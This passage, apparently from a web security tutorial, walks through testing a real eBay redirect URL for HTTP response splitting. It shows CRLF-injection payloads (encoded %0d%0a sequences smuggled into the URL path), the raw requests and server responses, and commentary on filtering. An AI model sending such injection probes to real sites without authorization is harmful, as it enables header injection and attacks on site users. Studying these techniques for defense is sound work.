
[Server Response Headers]
HTTP/1.x 301 Moved Permanently
Location: http://www.ebay.com/
Connection: close
It looks like this might be filtered, but let’s conduct a few experiments before
we assume that it’s not possible to inject any data.
[Our URL]
http://click3.ebay.com/230708911.57033.0.58042/%0d%0aHTTP/1.1%20200%20OK
[Client Request Headers]
GET /230708911.57033.0.58042/%0d%0aHTTP/1.1%20200%20OK HTTP/1.1
Host: click3.ebay.com
[Server Response Headers]
HTTP/1.x 301 Moved Permanently
Location: 1 200 ok
Connection: close
Interesting result that responded this time—we see Location: 1 200 OK,
which indicates that the dot is filtered for some reason, but after ...